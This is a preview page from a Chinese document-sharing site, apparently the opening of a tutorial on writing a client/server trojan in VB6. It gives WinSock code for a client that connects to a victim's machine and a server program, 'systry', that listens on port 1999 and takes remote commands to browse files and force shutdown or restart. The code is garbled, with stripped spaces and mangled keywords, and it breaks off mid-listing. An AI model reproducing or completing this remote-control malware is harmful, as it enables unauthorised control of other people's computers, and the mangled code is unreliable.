版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
1、淺談用VB6.0編寫木馬程序現(xiàn)在網(wǎng)絡(luò)上流行的木馬軟件基本都是客戶機(jī)服務(wù)器模式也就是所謂的CS結(jié)構(gòu),目前也有一些開始向BS結(jié)構(gòu)轉(zhuǎn)變,在這里暫且不對BS結(jié)構(gòu)進(jìn)行詳談,本文主要介紹CS結(jié)構(gòu)其原理就是在本機(jī)直接啟動運(yùn)行的程序擁有與使用者相同的權(quán)限。因此如果能夠啟動服務(wù)器端(即被攻擊的計(jì)算機(jī))的服務(wù)器程序,就可以使用相應(yīng)的客戶端工具客戶程序直接控制它了。下面來談?wù)勅绾斡肰B來實(shí)現(xiàn)它。首先使用VB建立兩個程序,一個為客戶端程序Client,一個為服
2、務(wù)器端程序systry。在Client工程中建立一個窗體,加載WinSock控件,稱為tcpClient,協(xié)議選擇TCP,再加入兩個文本框,用以輸入服務(wù)器的IP地址或服務(wù)器名,然后建立一個按鈕,按下之后就可以對連接進(jìn)行初始化了,代碼如下:PrivateSubcmdConnect_Click()IfLen(Text1.Text)=0Len(Text2.Text)=0ThenMsgBox(“請輸入主機(jī)名或主機(jī)IP地址。“)ExitSubEl
3、seIfLen(Text1.Text)0ThentcpClient.RemoteHost=Text1.TextElsetcpClient.RemoteHost=Text2.TextEndIfEndIftcpClient.ConnectTimer1.Enabled=TrueEndSub連接建立之后就可以使用DataArrival事件處理所收到的數(shù)據(jù)了。在服務(wù)器端systry工程也建立一個窗體,加載WinSock控件,稱為tcpServer
4、,協(xié)議選擇TCP,在Fm_Load事件中加入如下代碼:PrivateSubFm_Load()tcpServer.LocalPt=1999tcpServer.Listen把命令I(lǐng)D號存入mKey把命令參數(shù)存入strDatastrData=Right(strDataLen(strData)i)ExitFEndIfNextiCaseVal(mKey)Case1‘驅(qū)動器名、目錄名、文件名Case2強(qiáng)制關(guān)閉服務(wù)器端的計(jì)算機(jī)Case3強(qiáng)制重啟服務(wù)器
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 眾賞文庫僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
評論
0/150
提交評論